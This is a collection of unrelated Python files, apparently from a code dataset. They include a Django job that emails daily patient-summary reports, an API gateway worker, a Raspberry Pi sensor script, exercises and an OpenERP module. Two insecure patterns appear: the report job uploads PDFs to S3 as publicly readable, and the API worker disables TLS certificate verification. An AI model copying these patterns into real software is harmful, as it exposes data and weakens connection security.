temp = [i for i in triangle if i in pentagon and i in hexagon]
print(temp)
|
from lol_sift.features_utils import find_champion_in_picture
from lol_sift.lol_window_utils import (
select_lol_window,
get_champion_select_image,
click_champion_select,
)
|
import enum
import time
from datetime import timedelta
from uuid import uuid4
import boto3
from celery.decorators import periodic_task
from celery.schedules import crontab
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.utils.timezone import localtime, now
from hardcopy import bytestring_to_pdf
from care.facility.models.patient import PatientRegistration
from care.facility.models.patient_base import CATEGORY_CHOICES
from care.facility.models.shifting import SHIFTING_STATUS_CHOICES, ShiftingRequest
from care.users.models import District, State, User
from care.utils.whatsapp.send_media_message import generate_whatsapp_message
@periodic_task(run_every=crontab(minute="0", hour="8"))
def run_scheduled_district_reports():
AdminReports(AdminReportsMode.DISTRICT).generate_reports()
class InvalidModeException(Exception):
pass
class UploadNotSupported(Exception):
pass
class AdminReportsMode(enum.Enum):
STATE = "State"
DISTRICT = "District"
class AdminReports:
mode = None
filter_field = ""
unique_object_ids = []
start_date = None
end_date = None
def fetch_unique_districts(self) -> None:
self.unique_object_ids = list(
User.objects.filter(user_type=User.TYPE_VALUE_MAP["DistrictAdmin"], district__isnull=False)
.values_list("district_id", flat=True)
.distinct()
)
def fetch_unique_states(self) -> None:
self.unique_object_ids = list(
User.objects.filter(user_type=User.TYPE_VALUE_MAP["StateAdmin"], state__isnull=False)
.values_list("state_id", flat=True)
.distinct()
)
def __init__(self, mode) -> None:
self.mode = mode
if mode == AdminReportsMode.DISTRICT:
self.filter_field = "district_id"
self.fetch_unique_districts()
elif mode == AdminReportsMode.STATE:
self.filter_field = "state_id"
self.fetch_unique_states()
else:
raise InvalidModeException
self.start_date = (localtime(now()) - timedelta(days=1)).replace(hour=0, minute=0, second=0, microsecond=0)
self.end_date = self.start_date + timedelta(days=1)
def get_object_name(self, object_id):
if self.mode == AdminReportsMode.STATE:
return State.objects.get(id=object_id).name
elif self.mode == AdminReportsMode.DISTRICT:
return District.objects.get(id=object_id).name
def upload_file(self, file_name):
if not settings.USE_S3:
raise UploadNotSupported()
file_path = default_storage.path(file_name)
with open(file_path, "rb") as f:
file_content = f.read()
s3Client = boto3.client(
"s3",
region_name="ap-south-1",
aws_access_key_id=settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
)
key = "reports/" + str(uuid4()) + str(int(time.time())) + ".pdf"
s3Client.put_object(
Bucket=settings.AWS_STORAGE_BUCKET_NAME,
Key=key,
Body=file_content,
ContentType="application/pdf",
ACL="public-read",
)
return f"https://{settings.AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/{key}"
# Summary Functions
def calculate_patient_summary(self, base_filters):
return_dict = {}
base_queryset = PatientRegistration.objects.filter(**base_filters)
return_dict["current_active"] = base_queryset.filter(is_active=True).count()
return_dict["created_today"] = base_queryset.filter(
is_active=True, created_date__gte=self.start_date, created_date__lte=self.end_date
).count()
return_dict["discharged_today"] = base_queryset.filter(
is_active=False,
last_consultation__discharge_date__gte=self.start_date,
last_consultation__discharge_date__lt=self.end_date,
).count()
return return_dict
def caluclate_patient_age_summary(self, base_filters):
return_list = []
base_queryset = PatientRegistration.objects.filter(**base_filters)
age_brakets = [(0, 20), (20, 40), (40, 60), (60, 80), (80, 120)]
for braket in age_brakets:
count = base_queryset.filter(
is_active=True,
created_date__gte=self.start_date,
created_date__lte=self.end_date,
age__gte=braket[0],
age__lt=braket[1],
).count()
return_list.append({"total_count": count, "title": f"{braket[0]}-{braket[1]}"})
return return_list
def caluclate_patient_category_summary(self, base_filters):
return_list = []
base_queryset = PatientRegistration.objects.filter(**base_filters)
for category in CATEGORY_CHOICES:
count = base_queryset.filter(
is_active=True,
created_date__gte=self.start_date,
created_date__lte=self.end_date,
last_consultation__category=category[0],
).count()
return_list.append({"total_count": count, "title": category[1]})
return return_list
def calculate_shifting_summary(self, base_filters):
return_dict = {}
base_queryset = ShiftingRequest.objects.filter(**base_filters)
today_queryset = base_queryset.filter(created_date__gte=self.start_date, created_date__lte=self.end_date)
return_dict["total_up"] = today_queryset.filter(is_up_shift=True).count()
return_dict["total_down"] = today_queryset.filter(is_up_shift=False).count()
return_dict["total_count"] = return_dict["total_up"] + return_dict["total_down"]
return return_dict
def calculate_shifting_status_summary(self, base_filters):
return_list = []
base_queryset = ShiftingRequest.objects.filter(**base_filters)
today_queryset = base_queryset.filter(created_date__gte=self.start_date, created_date__lte=self.end_date)
for status in SHIFTING_STATUS_CHOICES:
total = today_queryset.filter(status=status[0]).count()
emergency = today_queryset.filter(status=status[0], emergency=True).count()
return_list.append({"total_count": total, "emergency_count": emergency, "status": status[1]})
return return_list
def generate_report_data(self, object_id):
final_data = {}
base_filters = {self.filter_field: object_id}
shifting_base_filter = {"patient__" + self.filter_field: object_id}
final_data["patients_summary"] = self.calculate_patient_summary(base_filters)
final_data["patients_age"] = self.caluclate_patient_age_summary(base_filters)
final_data["patients_categories"] = self.caluclate_patient_category_summary(base_filters)
final_data["shifting_summary"] = self.calculate_shifting_summary(shifting_base_filter)
final_data["shifting_status"] = self.calculate_shifting_status_summary(shifting_base_filter)
return final_data
def generate_reports(self):
for object_id in self.unique_object_ids:
data = self.generate_report_data(object_id)
data["object_type"] = self.mode.value
object_name = self.get_object_name(object_id)
data["object_name"] = object_name
data["current_date"] = str(self.start_date.date())
html_string = render_to_string("reports/daily_report.html", data)
file_name = str(int(round(time.time() * 1000))) + str(object_id) + ".pdf"
bytestring_to_pdf(
html_string.encode(),
default_storage.open(file_name, "w+"),
**{
"no-margins": None,
"disable-gpu": None,
"disable-dev-shm-usage": False,
"window-size": "2480,3508",
},
)
self.send_reports(object_name, {self.filter_field: object_id}, file_name)
default_storage.delete(file_name)
def send_email_report(self, object_name, file_name, user):
if not user.email:
return
file = default_storage.open(file_name, "rb")
msg = EmailMessage(
f"Care Summary : {self.mode.value} {object_name} : {self.start_date.date()}",
"Please find the attached report",
settings.DEFAULT_FROM_EMAIL,
(user.email,),
)
msg.content_subtype = "html"
msg.attach(f"{self.mode.value}Report.pdf", file.read(), "application/pdf")
msg.send()
def send_whatsapp_report(self, object_name, public_url, user):
if not user.alt_phone_number:
return
generate_whatsapp_message(object_name, public_url, user.alt_phone_number)
def send_reports(self, object_name, base_filters, file_name):
users = User.objects.all()
if self.mode == AdminReportsMode.STATE:
users = users.filter(user_type=User.TYPE_VALUE_MAP["StateAdmin"], **base_filters)
elif self.mode == AdminReportsMode.DISTRICT:
users = users.filter(user_type=User.TYPE_VALUE_MAP["DistrictAdmin"], **base_filters)
try:
public_url = self.upload_file(file_name)
except UploadNotSupported:
public_url = None
for user in users:
self.send_email_report(object_name, file_name, user)
if public_url:
self.send_whatsapp_report(object_name, public_url, user)
|
from PIL import Image
from six import BytesIO
def image_from_bytes(bytes_):
return Image.open(BytesIO(bytes_))
def png_format(image):
bytes_ = BytesIO()
image.save(bytes_, 'PNG')
return bytes_.getvalue()
class ScreenshotFromPngBytes(object):
def __init__(self, png_bytes):
self._png_bytes = png_bytes
def as_image(self):
return image_from_bytes(self._png_bytes)
def as_png_bytes(self):
return self._png_bytes
class ScreenshotFromImage(object):
def __init__(self, image):
self._image = image
def as_image(self):
return self._image.copy()
def as_png_bytes(self):
return png_format(self._image)
|
'''
@Author: Fallen
@Date: 2020-04-03 13:51:25
@LastEditTime: 2020-04-03 14:06:49
@LastEditors: Please set LastEditors
@Description: 字符串判断文件格式
@FilePath: \day02\字符串判断文件类型练习.py
'''
'''
练习:
给定一个路径,上传文件(记事本txt或者是图片jpg,png)
如果不是对应格式的,允许重新指定上传文件,
如果符合上传的规定则提示上传成功
'''
#允许重复,就是个循环,一般是死循环然后设置个跳出机制,可以写成一个函数
def upfilePic():
while True:
path = input("请选择文件:") #"D:\pictures\background.jpg"
p = path.rfind("\\")
filename = path[p+1:]
if filename.endswith("jpg") or filename.endswith("png") or filename.endswith("bmp"):
print("确实是图片,可以上传。")
else:
a = input("格式错误,重新上传嘛?(yes/no):")
if a.lower()=="yes":
continue
if a.lower()=="no":
break
else:
b = input("请输入yes或no:")
continue
#调用函数
upfilePic()
|
a =(ord("0"))
print(a)
print(ord("c"))
print(ord("&"))
|
# missed solution completely. needed help.
class Solution(object):
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
contains_one = False
num_len = len(nums)
for i in range(num_len):
if nums[i] == 1:
contains_one = True
if not contains_one:
return 1
if (num_len == 1):
return 2
for i in range(num_len):
if (nums[i] > num_len or nums[i] <= 0):
nums[i] = 1
for i in range(num_len):
x = abs(nums[i])
if (nums[x-1] > 0):
nums[x-1] *= -1
for i in range(num_len):
if (nums[i] > 0):
return i + 1
return num_len + 1
|
#-*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
so = 0
trig = 12
echo = 26
GPIO.setup(trig, GPIO.OUT)
GPIO.setup(echo, GPIO.IN)
def sendsonic(dis):
so = 0
if dis < 8:
so = 1
elif 8 <= dis < 16:
so = 2
elif 16 <= dis < 24:
so = 3
elif 24 <= dis < 32:
so = 4
elif 32 <= dis:
so = 5
return so
def presonic():
GPIO.setup(trig, GPIO.OUT)
GPIO.setup(echo, GPIO.IN)
GPIO.output(trig, False) # trig핀 low로 유지
def printsonic():
GPIO.output(trig, False) # trig핀 low로 유지
## trig핀 high로 만들어서 초음파 보냄. 10ms동안 유지
GPIO.output(trig, True)
time.sleep(0.000001)
GPIO.output(trig, False)
while GPIO.input(echo) == False: # echo핀 low일 때 시간 출력
pulse_start = time.time()
while GPIO.input(echo) == True: # echo핀 high일 때 시간 출력
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start # high로 유지한 시간 (거리)
distance = pulse_duration * 17000
distance = round(distance, 2)
##소수점 둘째자리까지
print("Distance : ", distance, "cm")
print("send : ",sendsonic(distance))
return sendsonic(distance)
GPIO.cleanup()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 28 21:33:25 2017
@author: Akhil
"""
#!/usr/bin/python
#===============================================
# image_manip.py
#
# some helpful hints for those of you
# who'll do the final project in Py
#
# bugs to vladimir dot kulyukin at usu dot edu
#===============================================
import argparse
import cv2
import os
import numpy as np
import pickle
# two dictionaries that map integers to images, i.e.,
# 2D numpy array.
TRAIN_IMAGE_DATA = []
TEST_IMAGE_DATA = []
# the train target is an array of 1's
TRAIN_TARGET = []
# the set target is an array of 0's.
TEST_TARGET = []
### Global counters for train and test samples
NUM_TRAIN_SAMPLES = 0
NUM_TEST_SAMPLES = 0
## define the root directory
ROOT_DIR = 'C:/Users/Akhil/OneDrive - aggiemail.usu.edu/Akhil/Fall 2017/TOC/nn_train/'
## read the single bee train images
YES_BEE_TRAIN = ROOT_DIR + 'single_bee_train'
for root, dirs, files in os.walk(YES_BEE_TRAIN):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
TRAIN_IMAGE_DATA.append(img)
TRAIN_TARGET.append(int(1))
NUM_TRAIN_SAMPLES +=1
## read the single bee test images
YES_BEE_TEST = ROOT_DIR + 'single_bee_test'
for root, dirs, files in os.walk(YES_BEE_TEST):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
# print img.shape
TEST_IMAGE_DATA.append(img)
TEST_TARGET.append(int(1))
NUM_TEST_SAMPLES += 1
## read the no-bee train images
NO_BEE_TRAIN = ROOT_DIR + 'no_bee_train'
for root, dirs, files in os.walk(NO_BEE_TRAIN):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
TRAIN_IMAGE_DATA.append(img)
TRAIN_TARGET.append(int(0))
NUM_TRAIN_SAMPLES += 1
# read the no-bee test images
NO_BEE_TEST = ROOT_DIR + 'no_bee_test'
for root, dirs, files in os.walk(NO_BEE_TEST):
for item in files:
if item.endswith('.png'):
ip = os.path.join(root, item)
img = (cv2.imread(ip)/float(255))
TEST_IMAGE_DATA.append(img)
TEST_TARGET.append(int(0))
NUM_TEST_SAMPLES += 1
print (NUM_TRAIN_SAMPLES)
print (NUM_TEST_SAMPLES)
TRAIN_IMAGE_DATA = np.asarray(TRAIN_IMAGE_DATA).astype(np.float32)
TEST_IMAGE_DATA = np.asarray(TEST_IMAGE_DATA).astype(np.float32)
TRAIN_TARGET = np.asarray(TRAIN_TARGET).astype(np.float32)
TEST_TARGET = np.asarray(TEST_TARGET).astype(np.float32)
with open("C:/Users/Akhil/OneDrive - aggiemail.usu.edu/Akhil/Fall 2017/TOC/nn_train/output.dat","wb") as f:
pickle.dump(TRAIN_IMAGE_DATA, f)
pickle.dump(TEST_IMAGE_DATA, f)
pickle.dump(TRAIN_TARGET,f)
pickle.dump(TEST_TARGET,f)
######################################
|
# Numericos
entero = 7
decimal = 7.5
otroDecimal = 7.0
otroDecimal = float(7.02)
# Cadenas
cadenaS = 'Holi'
cadenaC = "Boli"
cadenaS2 = "I'm Pato de Turing"
pruebaUno = cadenaS+" "+ cadenaC+""+str(decimal)
pruebaDos = entero + decimal
print(pruebaDos)
|
#Ce module rassemble les fonctions destinées à l'affichage graphique des résultats
import matplotlib.pyplot as py
def print_instance(inst):
dep = inst[0]
cust = inst[1:]
py.plot(dep[0], dep[1], color='blue', marker='o')
for i in cust:
py.plot(i[0], i[1], color='red', marker='o')
def print_route(route, inst, c):
x = []
y = []
for i in range(len(route)):
x.append(inst[route[i]][0])
y.append(inst[route[i]][1])
x.append(inst[route[0]][0])
y.append(inst[route[0]][1])
py.plot(x, y, label="route" + str(c))
def print_solution(routes, inst):
print_instance(inst)
c = 1
for i in routes:
print_route(i, inst, c)
c += 1
def print_edges(edges, inst, col):
for e in edges:
x = [inst[e[0]][0], inst[e[1]][0]]
y = [inst[e[0]][1], inst[e[1]][1]]
py.plot(x, y, color=col)
|
"""
TECHX API GATEWAY
GENRIC WORKER CLASS TO API CALLS TO EXTERNAL SERVICES
CREATED BY: FRBELLO AT CISCO DOT COM
DATE : JUL 2020
VERSION: 1.0
STATE: RC2
"""
__author__ = "Freddy Bello"
__author_email__ = "frbello@cisco.com"
__copyright__ = "Copyright (c) 2016-2020 Cisco and/or its affiliates."
__license__ = "MIT"
# ====== Libraries =========
import json
import logging
import requests
# ===== APIGW Libraries =======
# ==== Create a Logger ===
logger = logging.getLogger("apigw.APIGWorker")
# ==== Class Blueprint ===
class APIGWorker:
"""
Base Worker for API Calls operation
"""
def __init__(self, api_url):
self.__name__ = "APIGW Worker"
self.api_url = api_url
logger.info("APIGW Ready : %s", self.__name__)
def query_api(self, api_endpoint, api_headers):
"""
APIGW Worker API Caller
params:
api_enpoint = The URI call like /v1/dasdasd
api_method = GET,POST,PUT,PATCH,DELETE
api_headers = Any custom header
return:
a JSON Response
"""
url = self.api_url + api_endpoint
headers = api_headers
try:
rx_answer = requests.get(url, headers=headers, verify=False)
resp = json.loads(rx_answer.text)
logger.info("APIGW Worker request completed sucessfully")
except requests.exceptions.RequestException as err:
logger.error("APIGW Worker request failed : %s", err)
resp = {}
return resp
|
from functools import reduce
from operator import iconcat
from collections import Counter
from babybertsrl import configs
MODEL_NAME = 'childes-20191206'
# load model-based annotations
srl_path = configs.Dirs.data / 'training' / f'{MODEL_NAME}_no-dev_srl.txt'
text = srl_path.read_text()
lines = text.split('\n')[:-1]
# get a list of all tags
tag_lines = [line.split('|||')[1].split() for line in lines]
tags = reduce(iconcat, tag_lines, []) # flatten list of lists
print(f'num tags={len(tags):>9,}')
# remove "B-" and "I-"
tags_no_bio = [tag.lstrip('B-').lstrip('I-') for tag in tags]
# count
t2f = Counter(tags_no_bio)
for t, f in sorted(t2f.items(), key=lambda i: i[1]):
print(f'{t:<12} occurs {f:>9,} times')
|
# Generated by Django 2.1.4 on 2018-12-19 11:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contacts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='名字')),
('email', models.EmailField(max_length=100, verbose_name='邮箱')),
('subject', models.CharField(max_length=100, verbose_name='主题')),
('message', models.TextField(verbose_name='信息')),
('created_time', models.DateTimeField(auto_now=True, verbose_name='发送时间')),
],
),
]
|
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
# Credits######################################################
# Coded by: Vauxoo C.A.
# Planified by: Nhomar Hernandez
# Audited by: Vauxoo C.A.
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from openerp.osv import osv, fields
class InheritPriceListItem(osv.Model):
""" """
def default_get(self, cr, uid, fields, context=None):
'''test context '''
if context is None:
context = {}
res = super(InheritPriceListItem, self).default_get(
cr, uid, fields, context=context)
res.update({'product_id': context.get('create_item', False)})
version = context.get('versions', False)
version and res.update({'price_version_id': version and version[0]
and version[0][2]
and version[0][2][0]})
return res
def _get_price_list(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
for item in self.browse(cr, uid, ids, context=context):
res[item.id] = item.price_version_id and \
item.price_version_id.pricelist_id and \
item.price_version_id.pricelist_id.id
return res
def _compute_price(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
pricelist_obj = self.pool.get('product.pricelist')
if context.get('product', False):
for item in self.browse(cr, uid, ids, context=context):
price = pricelist_obj.price_get(cr, uid,
[item.price_list_id and item.price_list_id.id],
context.get('product'), 1, context=context)
price = item.price_list_id and price.get(item.price_list_id.id)
res[item.id] = price
else:
for item in self.browse(cr, uid, ids, context=context):
if item.product_id:
price = pricelist_obj.price_get(cr, uid,
[item.price_list_id and item.price_list_id.id],
item.product_id.id, 1, context=context)
price = item.price_list_id and price.get(
item.price_list_id.id)
res[item.id] = price
elif item.product_active_id:
price = pricelist_obj.price_get(cr, uid,
[item.price_list_id and item.price_list_id.id],
item.product_active_id and
item.product_active_id.id,
1, context=context)
price = item.price_list_id and price.get(
item.price_list_id.id)
res[item.id] = price
return res
_inherit = 'product.pricelist.item'
_columns = {
'price_list_id': fields.function(_get_price_list, method=True,
type='many2one', relation='product.pricelist',
string='Price LIst'),
'compute_price': fields.function(_compute_price, method=True,
type='float', string='Price'),
'price_version_id': fields.many2one('product.pricelist.version',
'Price List Version', required=True, select=True,
ondelete='cascade'),
'product_active_id': fields.many2one('product.product', 'product',
help='Product active to list price'),
'date_start': fields.related('price_version_id', 'date_start',
type='date', string='Date Start'),
'date_end': fields.related('price_version_id', 'date_end',
type='date', string='Date End'),
}
_defaults = {
'sequence': 1,
'base': 2,
}
def delete_record(self, cr, uid, ids, context=None):
if context is None:
context = {}
return ids and self.unlink(cr, uid, ids, context=context)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.